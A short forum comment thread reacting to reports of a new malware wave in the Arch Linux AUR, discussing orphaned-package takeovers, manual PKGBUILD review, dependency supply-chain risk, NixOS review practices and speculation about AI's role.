Arch Linux AUR Hit by Another Wave of Now More Sophisticated Malware Attack

7e

Companies like Anthropic and OpenAI need to sponsor open source projects by giving them free agent credits. Otherwise, bad actors can just outspend and totally overwhelm the somewhat dim and very overworked set of human maintainers. Humans in software are obsolete, full stop.

Shank

Is there any information on if this is the same attack vector (orphaned packages that were adopted)? I believe they already locked down adoption, but maybe also a combination of existing maintainers being taken over?

helterskelter

This is why I avoid AUR, it's too easy to become complacent. If I really want something from AUR I literally just look at the PKGBUILD for compilation instructions and do it manually by myself, but if it's got so many patches or dependencies that I can't go through them all by hand I just find another solution or do without. This is also why I really dislike a lot of modern languages with automated fetching of dependencies. It really fosters a sloppy attitude toward your supply chain because it's just too damned convenient. With a reasonably sized Go project for instance, you may be pulling in code from dozens of different git repos. It only takes one compromised repo or malicious package to sink the ship.

hollow-moe

Is the nixpkgs repo more "resilient" to these kind of attacks since an attacker would need the approval of a member with merge permission ?

bfrog

I’m moving all my machines to NixOS. I’d done this before but ran into time constraints creating ports for convoluted binary software. With LLMs now as good as they are it’s quite possible this isn’t a problem anymore. I’ll be finding out.

skeledrew

I wouldn't be surprised if this is some kind of implicit "use AI or else" statement. I've been anticipating some kind of hit on Gentoo given their outspoken no-AI stance. Unsure of Arch's.